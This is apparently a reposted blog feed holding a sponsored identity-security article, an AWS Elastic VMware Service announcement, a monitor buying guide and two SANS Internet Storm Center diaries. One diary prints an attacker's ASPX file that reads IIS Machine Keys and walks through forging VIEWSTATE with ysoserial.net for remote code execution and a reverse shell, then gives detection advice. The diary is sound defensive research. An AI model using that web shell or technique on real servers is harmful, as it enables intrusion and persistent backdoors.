Why identity is the definitive cyber defense for federal agencies

~ townsend.mw ~ Leave a comment

Identity has become the new cybersecurity perimeter. As federal agencies rapidly adopt cloud services, AI-powered tools and hybrid work models, identity security is now central to mission assurance.

However, for many federal leaders, identity management remains a complex puzzle. The abundance of tools — from password managers to identity governance systems — often leads to fragmented environments and operational gaps. Even when agencies understand its importance, aligning identity investments with mission objectives remains a significant hurdle.

Daniel Wilbricht is President of Optiv + ClearShark.

Adding to this complexity is a rapidly evolving environment in which cyber threats are becoming more sophisticated. AI-driven attacks mimic human behavior, bypassing traditional defenses with alarming speed. Static controls and perimeter-centric thinking can’t keep up. Identity governance, behavioral analytics and adaptive access controls must work in tandem to stay ahead of AI-enabled threats.

Federal agencies need integrated, adaptive identity architectures that continuously verify users and devices in real time. Implementing these layered protections not only improves security but also enhances user experience by adapting to risk in real time. In addition, agencies that adopt these capabilities are better equipped to defend against emerging threats without sacrificing efficiency.

A trusted partner for identity security

That’s where Optiv + ClearShark makes a difference. We bring a cybersecurity-first approach to identity, helping federal agencies reduce risk, meet compliance and streamline operations. Unlike one-size-fits-all providers, we help agencies optimize their existing investments — whether they use SailPoint, BeyondTrust, Ping or Okta. Our team understands how to integrate these technologies into a framework that fits the federal context. In other words, we tailor solutions to the mission, not the other way around.

In fact, our edge lies in our people. Many of our consultants and engineers are former federal employees with clearances and firsthand experience navigating agency environments. Their insights help bridge the gap between vendor capabilities and federal mission needs.

In the past 18 months, we’ve delivered managed identity services across the defense and intelligence communities. These solutions include secure monitoring and identity operations in highly classified cloud environments, supported through partnerships with AWS, Splunk and others.

By offloading infrastructure and operations to our cleared teams, agencies gained enhanced identity assurance and significant cost savings while maintaining full compliance with federal security standards.

Accelerating modernization with confidence

Modernization doesn’t need to come at the expense of security or compliance. A pilot-driven approach allows agencies to validate identity solutions in their own environments before scaling. This reduces risk, accelerates return on investment and ensures audit readiness.

For example, one civilian agency we supported had invested heavily in identity tools but continued to fail penetration tests and struggled with governance gaps between identity and security teams. By deploying SailPoint and BeyondTrust in a phased, integrated rollout and aligning the solution to compliance and security objectives, we helped the agency pass red team exercises, reduce manual identity processes and establish a scalable identity framework for future growth.

The mission starts with identity

Identity is the most targeted attack surface in federal IT today. Protecting it is not just an IT imperative; it’s a mission-critical requirement. But success requires more than tools. It requires deep expertise, integration and continuous improvement.

With the right strategy and trusted support, agencies can secure their identity infrastructure, meet audit requirements, and modernize with purpose. The stakes have never been higher, and identity has never mattered more in federal cybersecurity.

Learn more about how Optiv + ClearShark takes a cybersecurity-centric approach to identity management for government.

This article was sponsored by Optiv + ClearShark.

The post Why identity is the definitive cyber defense for federal agencies appeared first on CyberScoop.

from CyberScoop https://ift.tt/CxsNh3Q
via IFTTT

Introducing Amazon Elastic VMware Service for running VMware Cloud Foundation on AWS

~ townsend.mw ~ Leave a comment

Today, we’re announcing the general availability of Amazon Elastic VMware Service (Amazon EVS), a new AWS service that lets you run VMware Cloud Foundation (VCF) environments directly within your Amazon Virtual Private Cloud (Amazon VPC). With Amazon EVS, you can deploy fully functional VCF environments in just hours using a guided workflow, while running your VMware workloads on qualified Amazon Elastic Compute Cloud (Amazon EC2) bare metal instances and seamlessly integrating with AWS services such as Amazon FSx for NetApp ONTAP.

Many organizations running VMware workloads on premises want to move to the cloud to benefit from improved scalability, reliability, and access to cloud services, but migrating these workloads often requires substantial changes to applications and infrastructure configurations. Amazon EVS lets customers continue using their existing VMware expertise and tools without having to re-architect applications or change established practices, thereby simplifying the migration process while providing access to AWS’s scale, reliability, and broad set of services.

With Amazon EVS, you can run VMware workloads directly in your Amazon VPC. This gives you full control over your environments while being on AWS infrastructure. You can extend your on-premises networks and migrate workloads without changing IP addresses or operational runbooks, reducing complexity and risk.

Key capabilities and features

Amazon EVS delivers a comprehensive set of capabilities designed to streamline your VMware workload migration and management experience. The service enables seamless workload migration without the need for replatforming or changing hypervisors, which means you can maintain your existing infrastructure investments while moving to AWS. Through an intuitive, guided workflow on the AWS Management Console, you can efficiently provision and configure your EVS environments, significantly reducing the complexity to migrate your workloads to AWS.

With Amazon EVS, you can deploy a fully functional VCF environment running on AWS in a few hours. This process eliminates many of the manual steps and potential configuration errors that often occur during traditional deployments. Furthermore, with Amazon EVS you can optimize your virtualization stack on AWS. Given the VCF environment runs inside your VPC, you have full root access to the environment and the associated management appliances. You also have the ability to integrate third-party solutions, from external storage such as Amazon FSx for NetApp ONTAP or Pure Cloud Block Store or backup solutions such as Veeam Backup and Replication.

The service also gives you the ability to self-manage or work with AWS Partners to build, manage, and operate your environments. This provides you with flexibility to match your approach with your overall goals.

Setting up a new VCF environment

Organizations can streamline their setup process by ensuring they have all the necessary pre-requisites in place ahead of creating a new VCF environment. These prerequisites include having an active AWS account, configuring the appropriate AWS Identity and Access Management (IAM) permissions, and setting up a Amazon VPC with sufficient CIDR space and two Route Server endpoints, with each endpoint having its own peer. Additionally, customers will need to have their VMware Cloud Foundation license keys ready, secure Amazon EC2 capacity reservations specifically for i4i.metal instances, and prepare their VLAN subnet information planning.

To help ensure a smooth deployment process, we’ve provided a Getting started hub, which you can access from the EVS homepage as well as a comprehensive guide in our documentation. By following these preparation steps, you can avoid potential setup delays and ensure a successful environment creation.

Screenshots of EVS onboarding

Let’s walk through the process of setting up a new VCF environment using Amazon EVS.

Screenshots of EVS onboarding

You will need to provide your Site ID, which is allocated by Broadcom when purchasing VCF licenses, along with your license keys. To ensure a successful initial deployment, you should verify you have sufficient licensing coverage for a minimum of 256 cores. This translates to at least four i4i.metal instances, with each instance providing 64 physical cores.

This licensing requirement helps you maintain optimal performance and ensures your environment meets the necessary infrastructure specifications. By confirming these requirements upfront, you can avoid potential deployment delays and ensure a smooth setup process.

Screenshots of EVS onboarding

Once you have provided all the required details, you will be prompted to specify your host details. These are the underlying Amazon EC2 instances that your VCF environment will get deployed in.

Screenshots of EVS onboarding

Once you have filled out details for each of your host instances, you will need to configure your networking and management appliance DNS details. For further information on how to create a new VCF environment on Amazon EVS, follow the documentation here.

Screenshots of EVS onboarding

After you have created your VCF environment, you will be able to look over all of the host and configuration details through the AWS Console.

Additional things to know

Amazon EVS currently supports VCF version 5.2.1 and runs on i4i.metal instances. Future releases will expand VCF versions, licensing options, and more instance type support to provide even more flexibility for your deployments.

Amazon EVS provides flexible storage options. Your Amazon EVS local Instance storage is powered by VMware’s vSAN solution, which pools local disks across multiple ESXi hosts into a single distributed datastore. To scale your storage, you can leverage external Network File System (NFS) or iSCSI-based storage solutions. For example, Amazon FSx for NetApp ONTAP is particularly well-suited for use as an NFS datastore or shared block storage over iSCSI.

Additionally, Amazon EVS makes connecting your on-premises environments to AWS simple. You can connect from on-premises vSphere environment into Amazon EVS using a Direct Connect connection or a VPN that terminates into a transit gateway. Amazon EVS also manages the underlying connectivity from your VLAN subnets into your VMs.

AWS provides comprehensive support for all AWS services deployed by Amazon EVS, handling direct customer support while engaging with Broadcom for advanced support needs. Customers must maintain AWS Business Support on accounts running the service.

Availability and pricing

Amazon EVS is now generally available in US East (N. Virginia), US East (Ohio), US West (Oregon), Europe (Frankfurt), Europe (Ireland), and Asia Pacific (Tokyo) AWS Regions, with additional Regions coming soon. Pricing is based on the Amazon EC2 instances and AWS resources you use, with no minimum fees or upfront commitments.

To learn more, visit the Amazon EVS product page.

from AWS News Blog https://ift.tt/EaYqj6r
via IFTTT

Best Computer Monitors for the Productive Home Office (2026)

~ Reporter ~ Leave a comment

Introduction

Setting up a high-performance home office in 2026 means more than just a good chair and fast internet — your monitor is the centerpiece of your workspace. Whether you’re managing cybersecurity alerts, editing high-res media, analyzing dashboards, or simply juggling multiple windows, the right display can make or break your workflow.

In this guide, we’ve rounded up the best home office monitors for different use cases — including 4K USB-C monitors, ultrawide displays for multitasking, and affordable options for secondary setups. Each monitor here has been selected for its balance of resolution, ergonomics, connectivity, and value, so you can focus on productivity without compromise.

Let’s dive into some of the top monitors that can transform your desk into a command center.

Dell P2725QE 27” 4K UHD Monitor

The Dell P2725QE offers crisp 4K resolution and a fully adjustable stand, making it perfect for home office professionals who value detail and ergonomics. With USB-C connectivity delivering 90W power, built-in USB ports, and a sleek design, it doubles as both a monitor and a docking station for your laptop.

  • 27″ 4K UHD (3840×2160) IPS Display
  • USB-C with 90W Power Delivery
  • 99% sRGB, HDR support
  • Ergonomic stand with height, tilt, swivel
  • Built-in USB-C Hub for peripherals

Check Price on Amazon

LG 34WN80C-B 34” UltraWide

Ideal for multitaskers and cybersecurity analysts, the LG 34WN80C-B provides a 3440×1440 ultra-wide canvas for dashboards, terminal windows, and browser tabs. The USB-C port delivers 60W of power, and its HDR10 and IPS panel make it a reliable, visually stunning productivity powerhouse.

  • 34″ UltraWide QHD (3440×1440)
  • 99% sRGB, HDR10, IPS
  • USB-C with 60W PD
  • Great for multitasking/dashboards

Check Price on Amazon

ASUS ProArt Display PA278CGV

Designed for creative pros and engineers alike, the ASUS ProArt PA278CGV features factory-calibrated color accuracy (100% sRGB, Rec.709) and smooth 75Hz refresh. It includes USB-C, DisplayPort daisy-chaining, and an ergonomic stand, making it ideal for designers, coders, and content creators who demand precision.

  • 27″ QHD IPS, 100% sRGB & Rec.709
  • USB-C with 65W Power Delivery
  • Calman Verified Color Accuracy
  • Ideal for creative professionals

Check Price on Amazon

Acer CB272 27” Budget Monitor

The Acer CB272 is a budget-friendly monitor that delivers solid performance for everyday tasks. With a 1080p IPS display, slim bezels, and a 75Hz refresh rate, it’s a great choice as a secondary screen or for users who need a clean, reliable setup without spending a fortune.

  • 27″ Full HD IPS (1920×1080)
  • up to 120Hz Refresh Rate, Slim Bezel
  • Adjustable Ergonomic Stand
  • Great value for secondary use

Check Price on Amazon

Final Thoughts: Choosing the Right Monitor for Your Home Office

Your monitor isn’t just a screen — it’s a daily tool that directly impacts your efficiency, comfort, and focus. Whether you’re handling sensitive cybersecurity operations, designing content, or managing meetings and multitasking, investing in the right display pays off in productivity.

For sharp visuals and future-ready connectivity, the Dell P2725QE offers a 4K experience with USB-C power and clarity. If you need more screen real estate, the LG 34WN80C-B delivers ultrawide versatility perfect for analysts and multitaskers. Creative professionals will love the color precision of the ASUS ProArt PA278CGV, while the Acer CB272 remains a reliable choice for budget-conscious setups.

No matter your role or workspace size, there’s a monitor here to level up your home office. Pick the one that fits your workflow — and start working smarter, not harder.

[disclosure]

Stealing Machine Keys for fun and profit (or riding the SharePoint wave), (Tue, Aug 5th)

~ townsend.mw ~ Leave a comment

About 10 days ago exploits for Microsoft SharePoint (CVE-2025-53770, CVE-2025-53771) started being publicly abused – we wrote about that at here and here .

The original SharePoint vulnerability is a deserialization vulnerability that allowed an attacker to execute arbitrary commands – while these could be literally anything, majority of exploits that we analyzed resulted in attackers dropping an ASPX file that just revealed the IIS Machine Key to them. This prompted me into diving a bit deeper into how this can be abused.

What are IIS Machine Keys?

A Machine Key in IIS and ASP.NET is a configuration setting used to ensure the security and integrity of data exchanged between the server and clients.

Basically, it is responsible for validating and encrypting sensitive data such as VIEWSTATE, cookies, and session state, protecting them from tampering or unauthorized access. An IIS administrator can define specific Machine Key settings – there are many possible ways to configure all of this, but for this diary we will look into VIEWSTATE protection.

VIEWSTATE is a mechanism used in ASP.NET Web Forms to persist the state of controls and page data between postbacks (i.e., between user actions that send the page back to the server). It allows a developer to easily store values of various controls after a form has been submitted. VIEWSTATE is always used by an IIS APS.NET application.

Since VIEWSTATE can hold sensitive information, it should be appropriately protected. And this is where Machine Keys come into the game – they are used by IIS to prevent tampering of VIEWSTATE and (optionally) encrypt its contents.

By default, IIS (even the very latest version on Windows server 2025) will enable VIEWSTATE MAC (Message Authentication Code) validation but will leave encryption on “Auto” which means that it is not used, as shown in the figure below:

This is not too big of a problem, unless a developer decides to store something confidential in VIEWSTATE.

Machine Key, as you can probably guess by now, is used to perform validation – again, by default SHA1 is used. Several other algorithms are supported, with HMACSHA256 being the second most commonly used one.

Machine Key handling

Since Machine Key is used to validate VIEWSTATE integrity, it is obviously a very important security element. If an attacker gets Machine Key of a server, they can modify VIEWSTATE (and cookies) to arbitrary values and calculate proper MAC which could allow them to perform all sorts of abuse – even achieve remote code execution, as we will demonstrate later.

So, how does one handle this? The whole setup can get a bit complex depending under which account IIS is running, but in most common setups, one of the following two approaches is used:

  • Machine Key is automatically generated by IIS. This is the default setup (one you can see in the image above) and in this case Machine Key is stored in Registry.
  • Machine Key is generated by an administrator and stored in the web.config file. This is actually mandatory if you have a farm of servers behind a load balancer that need to be able to share sessions so such a setup is quite common!

Stealing a Machine Key

An attacker’s ultimate prize is to steal a Machine Key used by the target IIS server. So, how can they achieve that?

If the Machine Key is stored in a web.config file, in majority of cases it will be stored there in plain text! While it’s possible to encrypt the config section, this is very rarely done. In other words, an attacker that can fetch the web.config file can basically pwn the whole server!
This can be done, for example, through LFI (Local File Inclusion) or XXE (XML External Entities) vulnerabilities that allow the attacker to fetch contents of files.

If the Machine Key is automatically generated, it is stored in Registry, which means that the attacker needs code execution on the server to fetch this, but one important thing should be stressed here: there is nothing that can be done to prevent them from reading the Machine Key, provided they get code execution, even through ASPX files!

Back to our SharePoint story – once the original attackers exploited a vulnerable SharePoint server, they uploaded the following ASPX file:

<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
public void Page_load()
{
var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
}
</script>

What does this script do? It will try to read the web.config file and will display both validation and encryption keys, together with used mode. If a Machine Key was stored in web.config, it would be leaked to an attacker, as shown in the image below:

With Machine Key available, the attacker can now achieve RCE on the affected server, due to way deserialization of VIEWSTATE works (and this is a feature!) – more about that further below, but let’s see the other case, when Machine Key is automatically generated and not stored in web.config:

Oh! No luck for the attacker, this script was not able to fetch Machine Key. Phew, all good, we do not have to do anything … or do we? Remember that I wrote above that automatically generated Machine Keys are stored in Registry. Is there anything preventing the attacker to drop a bit better APSX file that can read Registry?

Unfortunately NOT, as Soroush Dalili wrote in their fantastic blog here – one can simply read the key, no matter where it is stored. Soroush published a small ASPX file that goes through all potential locations of a Machine Key.

Clearly SharePoint attackers either did not care about other locations (and were happy with web.config ones), or did not know about this, but if you use Soroush’s script, you can fetch Machine Key even when it’s automatically generated, as shown for the same application I am using as proof of concept below:

Bottom line here is the following: if anyone gets any code execution on an IIS server, you absolutely need to regenerate the server’s Machine Key. Windows will not do this automatically for you, and this key persists through reboots!

Remote Code Execution

So what can one do with Machine Key now?

While we can modify values in VIEWSTATE (it is a bit difficult to read it as it’s serialized, but not impossible, of course), one can also use Alvaro Munoz’s fantastic ysoserial.net, which has builtin support for generating VIEWSTATE objects.

Now that we have a valid Machine Key, ysoserial.net allows us to create an object which, upon deserialization on the server side, will execute code. Since MAC will be valid (and even encrypted, if needed), IIS will happily try to deserialize it with the LosFormatter class which will ultimately allow for Remote Code Execution through deserialization as there are known gadgets that can be used here.

There are two key points here:

  1. There is nothing an administrator can do to prevent this if an attacker has a valid Machine Key
  2. A malicious VIEWSTATE parameter can be used with *any* ASPX script on the server, it does not need to be the originally vulnerable one. There are some caveats on how to produce a valid VIEWSTATE parameter based on application path, but there are many other resources that explain how to do this.

To reiterate – once an attacker has a valid Machine Key they basically have a backdoor to the IIS server that they can use at any point in time, as long as the Machine Key has not been changed!

PoC || GTFO

Let’s demonstrate this. I have a very simple application that allows a user to input their name (and will use it in a diary in the future as well), that looks like this:

When the Submit button is clicked, the following request is sent:

Now, the IIS server that I have setup is using automatically generated Machine Keys, to make exploitation a bit more interesting (notice I didn’t say difficult). When using the script that Soroush posted, the following information can be again seen:


This leaves us with all information needed to exploit this server.

We will use ysoserial.net to do this, specifically with following options:

  • The plugin we will use will be ViewState, which will allow us to generate a malicious VIEWSTATE object, provided with know the Machine Key
  • The gadget chain will be TextFormattingRunProperties – it usually generates the shortest payload and supports LosFormatter
  • The command will be our PowerShell which will connect to our Netcat listener
  • Finally we will need to provide the following:
    • Validation key is the Machine Key from above. I will be using an application specific validation key as we can see that, besides Machine Key being automatically generated, the server is using IsolateApps so every application has its own Machine Key, which is derived from the initial one
    • Validation algorithm will be HMACSHA256
    • My path and apppath will correspond to the application I am attacking (see Soroush’s post for more information about this)
    • Finally I am using the algorithm suitable for .NET 4.0


All we need to do now is go back and resend the request, but this time with our malicious VIEWSTATE object:

The response will be 500 Internal Server Error, but that’s what we want:

And we get our reverse shell happy dance:

Finally, the attacker can now use this malicious VIEWSTATE object on any page that belongs to this application, no matter what other parameters are sent as IIS will first try to deserialize the received VIEWSTATE object. And that’s their persistent backdoor.

Detection

IIS will at least log an event when Viewstate verification has failed. Failed here does not mean that MAC was incorrect (that is silently ignored), but when the verification process failed, which will happen when deserialization is exploited.

Full VIEWSTATE object is logged so that also allows for inspection on what has happened. If you do not already, make sure that you are monitoring Event Code 4009 in Windows Application code. Such an event will look as shown below:


Bojan
?X | LinkedIn

INFIGO IS | An Allurity Group member

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

from SANS Internet Storm Center, InfoCON: green https://ift.tt/wsF84B2
via IFTTT

New Feature: Daily Trends Report, (Mon, Aug 4th)

~ townsend.mw ~ Leave a comment

I implemented a new report today, the "Daily Trends" report. It summarizes noteworthy data received from our honeypot. As with everything, it will improve if you provide feedback 🙂

There are two ways to receive the report:

  1. E-Mail: Sign up at https://ift.tt/IxmXz8l 
  2. JSON/HTTP: You may also just download the raw JSON data for the report at https://ift.tt/8cL5Jqv

The sections of the report:

  • Top 10 newly registered domains, based on our domain score (the higher, the more suspect)
  • Top 10 URLs: The top 10 newly seen URLs from our web honeypot.
  • Top 10 New SSH/Telnet usernames: Usernames our Cowrie honeypots have not seen before.
  • Top 10 Trending ports

The layout will be refined for sure. Let me know I the data is useful.

Can't receive the email? E-mail delivery has always been an issue, which is why we offer the HTML report as well.

 

daily trends reports snippet


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

from SANS Internet Storm Center, InfoCON: green https://ift.tt/xXeRhJ4
via IFTTT